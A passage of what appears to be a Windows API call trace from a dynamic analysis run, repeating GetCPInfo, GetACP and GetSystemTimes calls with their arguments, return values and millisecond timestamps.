returned 1 [0117.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.857] GetACP () returned 0x4e4 [0117.857] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.858] GetACP () returned 0x4e4 [0117.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.858] GetACP () returned 0x4e4 [0117.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.858] GetACP () returned 0x4e4 [0117.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.858] GetACP () returned 0x4e4 [0117.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.858] GetACP () returned 0x4e4 [0117.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.858] GetACP () returned 0x4e4 [0117.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.858] GetACP () returned 0x4e4 [0117.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.859] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.859] GetACP () returned 0x4e4 [0117.859] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.859] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.859] GetACP () returned 0x4e4 [0117.859] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.859] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.859] GetACP () returned 0x4e4 [0117.859] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.859] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.859] GetACP () returned 0x4e4 [0117.859] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.859] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.859] GetACP () returned 0x4e4 [0117.859] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.859] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.859] GetACP () returned 0x4e4 [0117.859] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.860] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.860] GetACP () returned 0x4e4 [0117.860] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.860] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.860] GetACP () returned 0x4e4 [0117.860] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.860] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.860] GetACP () returned 0x4e4 [0117.860] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.860] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.860] GetACP () returned 0x4e4 [0117.860] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.860] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.860] GetACP () returned 0x4e4 [0117.860] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.860] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.860] GetACP () returned 0x4e4 [0117.860] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.860] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.860] GetACP () returned 0x4e4 [0117.860] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.861] GetACP () returned 0x4e4 [0117.861] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.861] GetACP () returned 0x4e4 [0117.861] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.861] GetACP () returned 0x4e4 [0117.861] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.861] GetACP () returned 0x4e4 [0117.861] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.861] GetACP () returned 0x4e4 [0117.861] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.861] GetACP () returned 0x4e4 [0117.861] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.862] GetACP () returned 0x4e4 [0117.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.862] GetACP () returned 0x4e4 [0117.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.862] GetACP () returned 0x4e4 [0117.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.862] GetACP () returned 0x4e4 [0117.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.862] GetACP () returned 0x4e4 [0117.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.862] GetACP () returned 0x4e4 [0117.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.862] GetACP () returned 0x4e4 [0117.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.863] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.863] GetACP () returned 0x4e4 [0117.863] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.863] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.863] GetACP () returned 0x4e4 [0117.863] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.863] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.863] GetACP () returned 0x4e4 [0117.863] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.863] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.863] GetACP () returned 0x4e4 [0117.863] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.863] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.864] GetACP () returned 0x4e4 [0117.864] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.864] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.864] GetACP () returned 0x4e4 [0117.864] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.864] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.864] GetACP () returned 0x4e4 [0117.864] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.864] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.864] GetACP () returned 0x4e4 [0117.864] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.864] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.864] GetACP () returned 0x4e4 [0117.864] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.864] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.864] GetACP () returned 0x4e4 [0117.864] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.864] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.864] GetACP () returned 0x4e4 [0117.865] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.865] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.865] GetACP () returned 0x4e4 [0117.865] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.865] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.865] GetACP () returned 0x4e4 [0117.865] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.865] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.865] GetACP () returned 0x4e4 [0117.865] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.865] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.865] GetACP () returned 0x4e4 [0117.865] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.865] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.865] GetACP () returned 0x4e4 [0117.865] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.865] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.865] GetACP () returned 0x4e4 [0117.865] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.866] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.866] GetACP () returned 0x4e4 [0117.866] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.866] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.866] GetACP () returned 0x4e4 [0117.866] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.866] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.866] GetACP () returned 0x4e4 [0117.866] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.866] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.866] GetACP () returned 0x4e4 [0117.866] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.866] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.866] GetACP () returned 0x4e4 [0117.866] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.866] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.866] GetACP () returned 0x4e4 [0117.866] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.866] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.867] GetACP () returned 0x4e4 [0117.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.867] GetACP () returned 0x4e4 [0117.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.867] GetACP () returned 0x4e4 [0117.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.867] GetACP () returned 0x4e4 [0117.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.867] GetACP () returned 0x4e4 [0117.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.867] GetACP () returned 0x4e4 [0117.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.867] GetACP () returned 0x4e4 [0117.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.868] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.868] GetACP () returned 0x4e4 [0117.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.868] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.868] GetACP () returned 0x4e4 [0117.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.868] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.868] GetACP () returned 0x4e4 [0117.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.868] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.868] GetACP () returned 0x4e4 [0117.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.868] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.868] GetACP () returned 0x4e4 [0117.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.868] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.868] GetACP () returned 0x4e4 [0117.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.869] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.869] GetACP () returned 0x4e4 [0117.869] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.869] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.869] GetACP () returned 0x4e4 [0117.869] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.869] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.869] GetACP () returned 0x4e4 [0117.869] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.869] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.869] GetACP () returned 0x4e4 [0117.869] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.869] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.869] GetACP () returned 0x4e4 [0117.869] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.869] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.869] GetACP () returned 0x4e4 [0117.869] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.869] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.870] GetACP () returned 0x4e4 [0117.870] GetSystemTimes 